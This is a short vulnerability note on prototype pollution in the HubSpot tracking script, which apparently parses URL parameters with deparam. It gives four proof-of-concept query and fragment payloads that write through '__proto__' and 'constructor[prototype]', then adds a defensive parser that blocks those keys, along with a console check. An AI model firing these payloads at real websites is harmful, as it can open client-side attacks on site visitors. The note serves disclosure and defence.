hubspot.md

November 25, 2020

HubSpot Tracking Code

URL: https://knowledge.hubspot.com/reports/install-the-hubspot-tracking-code

Vulnerable code fragment

https://js.hs-analytics.net/analytics/12345/1234556789.js

Uses deparam

PoC

<script type="text/javascript" id="hs-script-loader" async defer src="https://js.hs-scripts.com/1234.js"></script>
?__proto__[test]=test
?constructor[prototype][test]=test
#__proto__[test]=test
#constructor[prototype][test]=test
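
Defensive counterpart to the PoC, as an added example that is not HubSpot's code or part of the original page: a deparam-style parser that builds its result on prototype-less objects and drops any pair whose key path contains `__proto__`, `constructor` or `prototype`. The names `safeDeparam`, `keyPath`, `decode`, `BLOCKED` and `PAYLOADS` are hypothetical, and the bracket syntax is assumed from the four payloads above.

```javascript
// Added example: hypothetical helper names, not taken from the HubSpot script.
const BLOCKED = new Set(['__proto__', 'constructor', 'prototype']);

// The four PoC strings from this page, reused as test input.
const PAYLOADS = [
  '?__proto__[test]=test',
  '?constructor[prototype][test]=test',
  '#__proto__[test]=test',
  '#constructor[prototype][test]=test',
];

// Percent-decode one component; keep the raw text if it is malformed.
function decode(s) {
  try { return decodeURIComponent(s.replace(/\+/g, ' ')); } catch { return s; }
}

// Split "a[b][c]" into ["a", "b", "c"].
function keyPath(rawKey) {
  const head = rawKey.split('[')[0];
  const rest = [...rawKey.matchAll(/\[([^\]]*)\]/g)].map(m => m[1]);
  return [head, ...rest];
}

// Parse a query string or fragment into a nested object without ever
// walking into Object.prototype.
function safeDeparam(input) {
  const out = Object.create(null);               // nothing inherited to pollute
  for (const pair of input.replace(/^[?#]/, '').split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    // Decode before checking, so %5F%5Fproto%5F%5F is caught as well.
    const path = keyPath(decode(eq < 0 ? pair : pair.slice(0, eq)));
    const value = decode(eq < 0 ? '' : pair.slice(eq + 1));
    if (path.some(k => BLOCKED.has(k))) continue; // drop the whole pair
    let node = out;
    for (const k of path.slice(0, -1)) {
      if (typeof node[k] !== 'object' || node[k] === null) {
        node[k] = Object.create(null);
      }
      node = node[k];
    }
    node[path[path.length - 1]] = value;
  }
  return out;
}
```

After parsing each payload, `({}).test` is still `undefined`, which is also the check to run in a browser console against any page that loads a deparam-based script.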
